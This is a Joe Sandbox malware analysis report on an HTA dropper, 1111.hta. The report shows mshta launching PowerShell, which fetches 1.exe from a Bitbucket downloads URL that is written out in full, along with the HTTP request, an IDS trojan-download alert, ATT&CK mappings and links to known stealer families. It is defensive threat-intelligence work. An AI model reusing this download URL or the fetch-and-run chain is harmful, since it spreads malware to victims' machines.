Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1111.hta	12%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bitbucket.org	185.166.143.50	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/docspaceplace/test2/downloads/1.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1991289274.0000000005C76000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net	powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1988997103.0000000004D66000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1988997103.0000000004D66000.00000004.00000800.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 00000001.00000002.1988997103.00000000053FC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://web-security-reports.services.atlassian.com/csp-report/bb-website	powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000001.00000002.1991289274.0000000005C76000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1991289274.0000000005C76000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bitbucket.org/docspace	mshta.exe, 00000000.00000002.1669144303.0000000003386000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1665182251.0000000003385000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1667893152.0000000003385000.00000004.00000020.00020000.00000000.sdmp	false	high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/	powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net	powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbuseruploads.s3.amazonaws.com/abde48e0-2204-4082-9ce6-f7134fa8a7af/downloads/d2d2c2de-519e-	powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://dz8aopenkvv6s.cloudfront.net	powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1988997103.0000000004D66000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bitbucket.org/docspaceplace	powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1988997103.0000000004C11000.00000004.00000800.00020000.00000000.sdmp	false	high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net	powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.cookielaw.org/	powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000001.00000002.1991289274.0000000005C76000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1991289274.0000000005C76000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;	powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aui-cdn.atlassian.com/	powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bitbucket.org/docspa$H9	mshta.exe, 00000000.00000002.1669144303.0000000003386000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1665182251.0000000003385000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1667893152.0000000003385000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1988997103.0000000004C11000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bitbucket.org	powershell.exe, 00000001.00000002.1988997103.0000000004D66000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.166.143.50	bitbucket.org	Germany		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583734
Start date and time:	2025-01-03 13:33:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1111.hta
Detection:	MAL
Classification:	mal96.evad.winHTA@4/4@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 25 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .hta Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6676 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:33:54	API Interceptor	1x Sleep call for process: mshta.exe modified
07:33:55	API Interceptor	46x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
185.166.143.50	j6ks0Fxu6t.exe	Get hash	malicious	LummaC	Browse
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse
	Yh6fS6qfTE.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	V7giEUv6Ee.bat	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bitbucket.org	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	Epsilon.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	j6ks0Fxu6t.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	fnCae9FQhg.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	SFtDA07UDr.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	Gq48hjKhZf.exe	Get hash	malicious	LodaRAT	Browse	185.166.143.49
	Gq48hjKhZf.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	185.166.143.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://d25mwe2145ri5.cloudfront.net/installer/33365003/2056290341532614624	Get hash	malicious	Unknown	Browse	18.239.15.218
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	34.249.145.219
	powerpc.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	x86.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	x86_64.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	MIPS.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	MIPSEL.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	52.217.199.81

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	qwertyuiopasdfghjklzxcvbnm.hta	Get hash	malicious	Unknown	Browse	185.166.143.50
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.166.143.50
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.166.143.50
	2Mi3lKoJfj.exe	Get hash	malicious	Quasar	Browse	185.166.143.50
	RFQ-12202431_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	RFQ-12202431_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	ogVinh0jhq.exe	Get hash	malicious	DCRat	Browse	185.166.143.50
	Sylacauga AL License.msg	Get hash	malicious	Unknown	Browse	185.166.143.50
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	185.166.143.50

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1348
Entropy (8bit):	5.4165743839926215
Encrypted:	false
SSDEEP:	24:3PWSKco4KmM6GjKbm51s4RPQoUebIKo+mZ9t7J0gt/NK3R8Cr8H1:/WSU4YymI4RIoUeW+mZ9tK8NWR8Cy
MD5:	68B7CEF089B17D88296A4BDFF4BF7B93
SHA1:	64DEE4BF3F03E74047F03C6EBDF6E3BFEABE6BBC
SHA-256:	0A9481EAB1A8482A6A2235C183F2D8D79593CE577CCCE65D560C8475E97E38BB
SHA-512:	3FC864335F1D4854ABA5CED7F0535156857FCAF12E78547D323E8CEC383F841369C96CD4A93ACE08D0244A665693B062CB4BA1FE29D1410955797526CB4A92B1
Malicious:	false
Reputation:	low
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwku2lq1.j52.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zg3fur5x.bsq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (1479), with CRLF line terminators
Entropy (8bit):	4.558447504281213
TrID:	Visual Basic Script (13500/0) 31.39% HyperText Markup Language (12001/1) 27.90% HyperText Markup Language (11501/1) 26.74% HyperText Markup Language (6006/1) 13.96%
File name:	1111.hta
File size:	2'505 bytes
MD5:	91b57eb5e0925c7522374b0c64902dfd
SHA1:	437da5eb27efeb38a9b7f804066205964a345a33
SHA256:	e5f2879072cdd3e4905f5fa8017be818d2c61f718d0fd322196e9cd54062ba4a
SHA512:	68dc36ae7ba35fb736677a7b179cfdea7b93ff7cb95ea27ffec9bde61cfc3358148cb612a33450b2b5ce452bf47077a8ed6e6d5b497e027b05415a89ec5b76f4
SSDEEP:	48:QfYtOoH8oFLGoBMdQB5y5tPv5KSrnyoexqXPBYHf:AqHdNBWY5y555Ky0qfE
TLSH:	81518A837BDA4765A8B514E80568650FE4F2D22335281986FBFE4213FB3D5A0BC0C7B4
File Content Preview:	<html>..<head>..<body>.. <title>HTA Script</title>.. <HTA:APPLICATION.. ID="oHTA".. APPLICATIONNAME="Document".. BORDER="none".. SCROLL="no".... SINGLEINSTANCE="yes".. SYSMENU="no".. WINDOWSTATE="mini

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T13:33:57.971582+0100	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	1	192.168.2.4	49730	185.166.143.50	443	TCP

Network Port Distribution

Total Packets: 10
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 13:33:56.766658068 CET	49730	443	192.168.2.4	185.166.143.50
Jan 3, 2025 13:33:56.766716957 CET	443	49730	185.166.143.50	192.168.2.4
Jan 3, 2025 13:33:56.766789913 CET	49730	443	192.168.2.4	185.166.143.50
Jan 3, 2025 13:33:56.777256966 CET	49730	443	192.168.2.4	185.166.143.50
Jan 3, 2025 13:33:56.777275085 CET	443	49730	185.166.143.50	192.168.2.4
Jan 3, 2025 13:33:57.507657051 CET	443	49730	185.166.143.50	192.168.2.4
Jan 3, 2025 13:33:57.507742882 CET	49730	443	192.168.2.4	185.166.143.50
Jan 3, 2025 13:33:57.511372089 CET	49730	443	192.168.2.4	185.166.143.50
Jan 3, 2025 13:33:57.511387110 CET	443	49730	185.166.143.50	192.168.2.4
Jan 3, 2025 13:33:57.511679888 CET	443	49730	185.166.143.50	192.168.2.4
Jan 3, 2025 13:33:57.527928114 CET	49730	443	192.168.2.4	185.166.143.50
Jan 3, 2025 13:33:57.575357914 CET	443	49730	185.166.143.50	192.168.2.4
Jan 3, 2025 13:33:57.971569061 CET	443	49730	185.166.143.50	192.168.2.4
Jan 3, 2025 13:33:57.971589088 CET	443	49730	185.166.143.50	192.168.2.4
Jan 3, 2025 13:33:57.971651077 CET	443	49730	185.166.143.50	192.168.2.4
Jan 3, 2025 13:33:57.971693039 CET	49730	443	192.168.2.4	185.166.143.50
Jan 3, 2025 13:33:57.971868992 CET	49730	443	192.168.2.4	185.166.143.50
Jan 3, 2025 13:33:57.996201038 CET	49730	443	192.168.2.4	185.166.143.50

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 13:33:56.754306078 CET	55884	53	192.168.2.4	1.1.1.1
Jan 3, 2025 13:33:56.761910915 CET	53	55884	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 13:33:56.754306078 CET	192.168.2.4	1.1.1.1	0x4f7f	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 13:33:56.761910915 CET	1.1.1.1	192.168.2.4	0x4f7f	No error (0)	bitbucket.org	185.166.143.50	A (IP address)	IN (0x0001)	false
Jan 3, 2025 13:33:56.761910915 CET	1.1.1.1	192.168.2.4	0x4f7f	No error (0)	bitbucket.org	185.166.143.48	A (IP address)	IN (0x0001)	false
Jan 3, 2025 13:33:56.761910915 CET	1.1.1.1	192.168.2.4	0x4f7f	No error (0)	bitbucket.org	185.166.143.49	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bitbucket.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.166.143.50	443	6676	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 12:33:57 UTC	98	OUT	GET /docspaceplace/test2/downloads/1.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
2025-01-03 12:33:57 UTC	5897	IN	HTTP/1.1 302 Found Date: Fri, 03 Jan 2025 12:33:57 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/abde48e0-2204-4082-9ce6-f7134fa8a7af/downloads/d2d2c2de-519e-4d88-8ccf-4ad08c327b4b/1.exe?response-content-disposition=attachment%3B%20filename%3D%221.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHWADVXP2&Signature=0Sx0EuXwPX84CNuE0sCFX6fSFpU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBUaCXVzLWVhc3QtMSJIMEYCIQDpk5pouNJCpaedaNbJncu68wRXzJntkTkE4WZ90Id07AIhAI7U%2BA5CSH3OuRUS8zSuTk2zACbThEZ4FaiOctsrJgWcKrACCO7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwQ7DNP4%2FzCmKajnEUqhAJSvEHJDNr6K9IHg7MWCAFOnc%2BaafXydGuW4KGaKYfoZm9i3BNOjR%2BSsxPe388xV9WYQmeRd%2FLvX0W3JWgyyktvOt%2BA2WhwjCIzMjyKRst01PqhMf0dNu4qoJS5vXUFRqh%2FIhq%2FgGhdJhYPmSXU2dRWAXQZfa9QYSp2fUk8WVb37JJd6XxMT7aqch7O6lBrCZwD0IpjO0FqkhGh9w7qnKtQ0E0G7yRFXZpR3QSQEDM1uSzNE9WsKEqfmEzNvZLDdMZ06%2FrtVeFBpPHA0rvQC%2Bp6lB4ec0WXNXQklKpjC6rptQyJzdz8rdwVQv%2Fz%2FjHzTCZn3Usx6vfUoY4U7oK0ojqZYdNMDzDQr9%2B7BjqcAdwLCq%2B8BKNKiKQ4iVgtdTM%2F%2Bbn05cc8kHal%2B3iYYFahqA9nkMS39CvBbw2i8hGpqwkb6gpQJO3xrBQggWx4wtKrVyrZXZPMdMCOfHyGY5bAIiGmk [TRUNCATED] Expires: Fri, 03 Jan 2025 12:33:57 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: dac2b47521c9 X-Version: c9b3998323c0 X-Static-Version: c9b3998323c0 X-Request-Count: 3287 X-Render-Time: 0.044811248779296875 X-B3-Traceid: df99673df2ac46b9836ba8f944f589c4 X-B3-Spanid: 6fee1f188ef7dfac X-Frame-Options: SAMEORIGIN Content-Security-Policy: connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net 